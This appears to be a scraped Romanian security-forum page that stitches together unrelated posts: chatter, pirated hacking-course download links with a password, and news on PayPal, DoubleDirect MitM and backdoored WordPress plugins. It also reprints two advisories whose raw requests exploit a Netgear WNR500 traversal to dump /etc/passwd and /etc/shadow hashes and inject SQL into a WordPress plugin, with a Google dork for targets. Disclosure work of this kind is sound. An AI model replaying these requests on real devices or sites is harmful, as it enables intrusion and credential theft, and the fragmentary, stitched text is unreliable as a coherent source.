Aerosol

Man ii doare pe ei in cuc de pierderi ca au primit reclama gratuita, a fost doar o strategie de a pacali populatia. "Uite frate dupa ce ca s-au pacalit isi onoreaza comenzile asa da, hai sa comand si eu" Frate nu o sa iasa in pierdere stai linistit.

Sa traiesti @io.kent sper sa nu schimbe "colorati" parola...

Inseamna ca nu te-ai uitat bine chiar au avut problema Pfua nu puteam sa iau si eu un laptop cu 4 lei Oricum toata chestia asta a fost strategie de marketing si nimic alteceva, eroare? cine crede asta?

Nu e al meu frate acel site... e site-ul unui amic...

LOL, Coaie in ce fel e editat video asta ii arata doar partea proasta a lui (bine aici nu sunt sigur daca are si o parte buna) "Sa miste toate fetele din buric."

Cea mai vulnerabila platforma Sunt curios joomla sau wordpress care e mai de rahat...

@zachary1337 Trimite sms gratis in romania asta nu isi baga sursa nu toate site-urile sunt la fel.

Ai user+pass ai link-ul si ip-urile alea +port sunt proxy te descurci tu...

@misefalfaie Free SMS Italy

@Nytro Oricum din ce in ce mai inventivi baietii astia

Trimite sms gratis eu il folosesc ( trebuie sa te conectezi cu contul de facebook, poti alege si tu un cont facut de plictiseala nu conteaza vechime posturi etc...)

Eu am ales sa-mi vina la posta vamala fiindca eram aproape

Learn The Basics of Ethical Hacking in Easy Steps [udemy] Here is a course of Ethical Hacking and Pentest. How to Download File From Dogefile Credit's to : Altair Real Price: 499 5 Lesson Total. Download: Section 1 Section 2 Section 3 Section 4 Section 5 Section 6 Section 7 Section 8 Section 9 ========================================== SQL Injection Master Course [udemy] -Real Price: $300 Credit's to : Altair -43 Lecture Total Download

Credit's to D30N3 Download Link: 788 MB Download file for free Password: onevatan.com

Paypal has closed a remote code execution vulnerability in its service some 18 months after it was reported. The flaws reported earlier this month rated critical by Vulnerability Lab affected a core Paypal profile application. Kunz Mejr also found a filter bypass and persistent bug during his penetration test in the same vulnerable parameter location. He said attackers with an user account in hand could load script and remotely execute arbitrary code to access local web-server files and configurations. Exploitation of the system specific code execution vulnerability required only a low privileged Paypal account with restricted access and did not need user interaction. Attackers could include a frame with a local request through trusted context to capture unauthorised system data and could deploy webshell injects could during the execution point of the Paypal users profile, he said. Paypal was notified in April 2013 and engaged in feedback until a patch was issued 25 October this year and an unspecified reward issued through eBay's bug bounty program. The bug was the second recently disclosed by Vulnerability Lab in Paypal. Researcher Ateeq Khan reported a medium severity flaw in Paypal's shipping service that could allow an attacker to inject malicious code into a form to target users. ® Source

Cand intrebi daca ar merge te referi daca ar fi "popular"? Depinde de foarte multi factori: complexicate design cat de bine satisface nevoile utilizatorilor cum se misca Daca te referi la facut bani din varianta premium la inceput va fi cam greu.

Chiar o cauta un amic

aaaa 3$ e transportul la ceas insa daca iei mai multe (3,4 etc... se face reducere la 2$)

@indianul eu cred ca daca a reusit sa se ascunda 5 ani va mai reusi sa se ascunda inca 10 si asa se va pierde interesul... Cat despre partea cu prietenul chiar ai avea incredere in cineva ca iti va returna acei banii? )

Hai noroc, daca tot vrei sa ramai pe aici ar fi bine sa citesti regulamentul

Security researchers have discovered a new type of "Man-in-the-Middle" (MitM) attack in the wild targeting smartphone and tablets users on devices running either iOS or Android around the world. The MitM attack, dubbed DoubleDirect, enables an attacker to redirect a victim’s traffic of major websites such as Google, Facebook and Twitter to a device controlled by the attacker. Once done, cyber crooks can steal victims’ valuable personal data, such as email IDs, login credentials and banking information as well as can deliver malware to the targeted mobile device. San Francisco-based mobile security firm Zimperium detailed the threat in a Thursday blog post, revealing that the DoubleDirect technique is being used by attackers in the wild in attacks against the users of web giants including Google, Facebook, Hotmail, Live.com and Twitter, across 31 countries, including the U.S., the U.K. and Canada. DoubleDirect makes use of ICMP (Internet Control Message Protocol) redirect packets in order to change the routing tables of a host — used by routers to announce a machine of a better route for a certain destination. In addition to iOS and Android devices, DoubleDirect potentially targets Mac OSX users as well. However, users of Windows and Linux are immune to the attack because their operating systems don't accept ICMP re-direction packets that carry the malicious traffic. The security firm tested the attack and it works on the latest versions of iOS, including version 8.1.1; most Android devices, including Nexus 5 and Lollipop; and also on OS X Yosemite. The firm also showed users how to manually disable ICMP Redirect on their Macs to remediate the issue. The company has provided a complete Proof-of-Concept (PoC) for the DoubleDirect Attack, users can downloaded it from the web. It demonstrates the possibility of a full-duplex ICMP redirect attack by predicting the IP addresses the victim tries to connect to, by sniffing the DNS traffic of the target; the next step consists of sending an ICMP redirect packet to all IP addresses. Source

Researchers have discovered a group of attackers who have published a variety of compromised WordPress themes and plug-ins on legitimate-looking sites, tricking developers into downloading and installing them on their own sites. The components then give the attackers remote control of the compromised sites and researchers say the attack may have been ongoing since September 2013. The incident came to light through an investigation by researchers at Fox-IT in the Netherlands, who discovered it after noticing a compromised Joomla plug-in on a customer’s site. After a little investigation, they discovered that the plug-in had been downloaded from a site that offers a list of pirated themes and plug-ins. CryptoPHP is the name the researchers have given to the malware that’s delivered with the compromised components, and the backdoor has a number of capabilities. It carries with it several hardcoded domains for command-and-control communications and uses RSA encryption to protect its communications with the C2 servers. Some versions also have a backup ability to communicate over email if the C2 domains are taken down. The PHPCrypto malware can update itself, inject content into the compromised sites it sits on and perform several other functions. But the main purpose of the malware is to conduct blackhat SEO operations. But the main purpose of the malware is to conduct blackhat SEO operations. The goal of these campaigns is to jack up the rank of sites controlled by the attackers, or their customers, which helps them look legitimate. This is done sometimes for gambling sites or similar sites and can also be tied to other scams. The researchers have traced the attack to an IP address in Moldova, and the C2 servers are located in the Netherlands, Germany, Poland and the United States. Fox-IT said that they have identified thousands of plug-ins that have been backdoored, including both WordPress and Joomla plug-ins and themes and Drupal themes. Source

Netgear Wireless Router WNR500 Parameter Traversal Arbitrary File Access Exploit Vendor: NETGEAR Product web page: http://www.netgear.com Affected version: WNR500 (firmware: 1.0.7.2) Summary: The NETGEAR compact N150 classic wireless router (WNR500) improves your legacy Wireless-G network. It is a simple, secure way to share your Internet connection and allows you to easily surf the Internet, use email, and have online chats. The quick, CD-less setup can be done through a web browser. The small, efficient design fits perfectly into your home. Desc: The router suffers from an authenticated file inclusion vulnerability (LFI) when input passed thru the 'getpage' parameter to 'webproc' script is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks. Tested on: mini_httpd/1.19 19dec2003 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5208 Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5208.php[/url] 16.11.2014 -- = 1 ============================================================= GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null HTTP/1.1 Host: 192.168.1.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us Authorization: Basic YWRtaW46cGFzc3dvcmQ= Connection: keep-alive --- HTTP/1.0 200 OK Content-type: text/html Cache-Control: no-cache set-cookie: sessionid=7dc3268b; set-cookie: auth=ok; set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT; #root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh = 2 ============================================================= GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1 Host: 192.168.1.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us Authorization: Basic YWRtaW46cGFzc3dvcmQ= Connection: keep-alive --- HTTP/1.0 200 OK Content-type: text/html Cache-Control: no-cache set-cookie: sessionid=7dc3268b; set-cookie: auth=ok; set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT; #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: Source

Vulnerability title: Multiple SQL Injection in SP Client Document Manager plugin Plugin: SP Client Document Manager Vendor: http://smartypantsplugins.com Product: https://wordpress.org/plugins/sp-client-document-manager/ Affected version: version 2.4.1 and previous version Fixed version: N/A Google dork: inurl:wp-content/plugins/sp-client-document-manager Reported by: Dang Quoc Thai - thai.q.dang (at) itas (dot) vn Credits to ITAS Team - www.itas.vn ::DESCRITION:: Multiple SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URL and parameter has been confirmed to suffer from SQL injection: Link 1: POST /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=email-vendor HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://target.org/wordpress/?page_id=16 Cookie: wordpress_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7Cc493b6c21a4a1916e2bc6076600939af5276b6feb09d06ecc043c37bd92a0748; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7C7995fe13b1bbe0761cb05258e4e13b20b27cc9cedf3bc337440672353309e8a3; bp-activity-oldestpage=1 Connection: keep-alive Content-Length: 33 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 vendor_email[]=<SQL Injection> Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php Vulnerable code: (Line: 1516 -> 1530) function email_vendor() { global $wpdb, $current_user; if (count($_POST['vendor_email']) == 0) { echo '<p style="color:red;font-weight:bold">' . __("Please select at least one file!", "sp-cdm") . '</p>'; } else { $files = implode(",", $_POST['vendor_email']); echo "SELECT * FROM " . $wpdb->prefix . "sp_cu WHERE id IN (" . $files . ")"."\n"; $r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu WHERE id IN (" . $files . ")", ARRAY_A); Link 2: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection> GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection> HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c Connection: keep-alive Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php Vulnerable code: (Line: 1462 -> 1479) function download_project() { global $wpdb, $current_user; $user_ID = $_GET['id']; $r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu where pid = $user_ID order by date desc", ARRAY_A); $r_project = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu_project where id = $user_ID ", ARRAY_A); $return_file = "" . preg_replace('/[^\w\d_ -]/si', '', stripslashes($r_project[0]['name'])) . ".zip"; $zip = new Zip(); $dir = '' . SP_CDM_UPLOADS_DIR . '' . $r_project[0]['uid'] . '/'; $path = '' . SP_CDM_UPLOADS_DIR_URL . '' . $r_project[0]['uid'] . '/'; //@unlink($dir.$return_file); for ($i = 0; $i < count($r); $i++) { $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file'])); } $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves. $zip->setZipFile($dir . $return_file); header("Location: " . $path . $return_file . ""); } Link 3: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection> GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection> HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c Connection: keep-alive Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php Vulnerable code: (Line: 1480 -> 1496) function download_archive() { global $wpdb, $current_user; $user_ID = $_GET['id']; $dir = '' . SP_CDM_UPLOADS_DIR . '' . $user_ID . '/'; $path = '' . SP_CDM_UPLOADS_DIR_URL . '' . $user_ID . '/'; $return_file = "Account.zip"; $zip = new Zip(); $r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu where uid = $user_ID order by date desc", ARRAY_A); //@unlink($dir.$return_file); for ($i = 0; $i < count($r); $i++) { $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file'])); } $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves. $zip->setZipFile($dir . $return_file); header("Location: " . $path . $return_file . ""); } Link 4: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection> GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection> HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c Connection: keep-alive Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php Vulnerable code: (Line: 1480 -> 1496) Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php Vulnerable code: (Line: 368 -> 372) function remove_cat() { global $wpdb, $current_user; $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_REQUEST['id'] . " "); $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu WHERE pid = " . $_REQUEST['id'] . " "); } ::DISCLOSURE:: + 10/30/2014: Notify to vendor - vendor does not response + 11/08/2014: Notify to vendor - Vendor blocks IPs from Vietnam + 11/05/2014: Notify to vendor - vendor does not response + 11/20/2014: Public information ::REFERENCE:: https://www.youtube.com/watch?v=AR3xCcuEJHc Source

A hacker group by the name of DerpTrolling claims to have hacked the PlayStation Network, Windows Live, and 2K Games Studios platforms, posting many of the username/password combinations on Pastebin to prove it. According to CNET, the Pastebin link includes usernames and passwords for 2,131 PlayStation Network users, 1,473 Windows Live users, and 2,000 2k Game Studios users. The hacking group had previously said it didn’t want to leak customer data, but explained why it changed its mind in the Pastebin document. We will just leave this here.http://t.co/MjN4mEmKNj — DERP (@GabenTheLord) November 20, 2014 The DerpTrolling group insists it wants to force these major gaming companies — Sony, Microsoft, and 2K — into upgrading their servers to prevent this type of hacking, but in case those companies don’t get the message, DerpTrolling claims to have even more data. We’ve reached out to Microsoft, Sony, and 2K, and we’ll update this story as soon as we learn more. As we wait for official word from these companies, we strongly advise any users of these platforms change the passwords associated with their accounts. Source